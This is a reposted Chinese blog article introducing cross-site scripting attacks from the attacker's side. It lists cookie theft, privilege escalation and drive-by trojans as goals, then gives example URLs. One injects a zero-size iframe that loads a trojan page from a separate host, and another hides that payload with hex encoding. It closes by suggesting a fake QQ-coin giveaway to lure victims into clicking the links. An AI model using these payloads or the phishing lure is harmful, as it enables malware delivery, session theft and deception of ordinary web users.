专题研究第三期:XSS攻击——跨站(引言篇)

来源:互联网 发布:《网络创世纪》 编辑:程序博客网 时间:2024/05/20 14:24

sql注射像一把利剑直接插入目标的胸膛,犀利得锋芒毕露。接下来我们一起来看看跨站。我把她比作“温柔杀手”,一把隐在背后的匕首。

引言之 跨站利用思维导向

sql注射是直接针对具有sql注射漏洞的系统,我们的目标很明确。而跨站的目标是 client——客户端。即访问者。这决定了其隐蔽性。
如何去思考利用一个跨站漏洞?
站在访问者的角度去测试就可以很好的尝试到这个温柔杀手的威力。

1 document.cookie 盗取cookie信息
2 非法权限提升
3 挂马
4 间接伤害(借刀杀人)

--------------------------------------------------------------------------------------
第一点是最常见的利用方式,而第二点主要还是针对网站管理员来设置的陷阱。这个利用方式需要在获取程序源码的一定程度上才能有效利用。第三点也比较常见。而第四点可能不太明白。举个例子:
假设
www.wang1.cn 网一存在跨站漏洞
其漏洞页面是 thead.php
构造:
http://www.wang1.cn/thead.php?id=<script>alert("你中招了!")</script>
那么我们把这个URL发给别人的时候,别人得到一个弹出框
再恶意点:我们配置一个网马页面
http://www.mama.com/index.htm
于是我们这样构造:http://www.wang1.cn/thead.php?id=<iframe src=http://www.mama.com/index.htm width=0 height=0></iframe>
嘿嘿,别人访问这个地址的时候得到的却是我们的网马页面。
事实上,我们的欺骗还可以更加隐蔽一点,对url进行重新编码:

http://www.wang1.cn/thead.php?id=%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%77%77%77%2E%6D%61%6D%61%2E%63%6F%6D%2F%69%6E%64%65%78%2E%68%74%6D%20%77%69%64%74%68%3D%30%20%68%65%69%67%68%74%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E

这样的话,一般人还真迷糊了。

问题来了:

谁会相信你直接访问你给的url地址呢?

答案:
信任构筑于一个基本安全的环境。
假设 我们这个url的头部是
http://www.163.com;www.qq.com。。。你还会怀疑吗?
假如我们构建这样一个页面,慌称qq最近有活动,赠送Q币,然后大量发送精心构造的URL,有多少人会上当呢?

接下来的几篇,我将逐一示范跨站技巧的一些运用。当然也欢迎网一会员提交文章。

原创粉丝点击